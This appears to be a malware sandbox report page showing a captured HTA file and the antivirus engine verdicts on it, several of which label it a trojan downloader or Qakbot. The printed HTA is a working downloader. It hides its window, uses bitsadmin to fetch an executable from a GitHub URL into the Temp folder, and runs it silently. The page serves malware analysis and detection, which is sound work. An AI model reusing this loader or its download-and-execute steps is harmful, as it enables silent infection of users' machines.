popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.MoveTo -4000, -4000
set runn = CreateObject("WScript.Shell")
dim file
file = "%Temp%" & "\system.exe"
const DontWaitUntilFinished = false, ShowWindow = 1, DontShowWindow = 0, WaitUntilFinished = true
set oShell = CreateObject("WScript.Shell")
oShell.Run "bitsadmin /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe " & file, DontShowWindow, WaitUntilFinished
runn.Run file
Close
</script>
<hta:application id="oHTA" applicationname="Bonjour" application="yes" width="10px" height="10px"></hta:application>
</head>
<body>
</body>
</html>
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX vba.bot.generic
CAT-QuickHeal Clean
Skyhigh Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec CL.Downloader!gen92
ESET-NOD32 VBS/TrojanDownloader.Agent.WUN
TrendMicro-HouseCall Possible_SMHANCITORGMNE
Avast VBS:Runner-NG [Trj]
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Generic.HTA.Qakbot.H.17EC50FD
NANO-Antivirus Trojan.Script.Downloader.kslccp
ViRobot Clean
MicroWorld-eScan Generic.HTA.Qakbot.H.17EC50FD
Tencent Vbs.Trojan-Downloader.Der.Ddhl
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Generic.HTA.Qakbot.H.17EC50FD
TrendMicro Possible_SMHANCITORGMNE
CMC Clean
Emsisoft Generic.HTA.Qakbot.H.17EC50FD (B)
huorong TrojanDownloader/VBS.NetLoader.ad
FireEye Generic.HTA.Qakbot.H.17EC50FD
Jiangmin Clean
Varist JS/Agent.ATW!Eldorado
Avira Clean
Fortinet VBS/Agent.VHJ!tr.dldr
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Generic.HTA.Qakbot.H.17EC50FD
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Clean
Zoner Clean
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:eqceN2cLLcS)
Yandex Clean
Ikarus Trojan-Downloader.VBS.Agent
MaxSecure Clean
GData Generic.HTA.Qakbot.H.17EC50FD
AVG VBS:Runner-NG [Trj]
Panda Clean
alibabacloud Clean
No IRMA results available.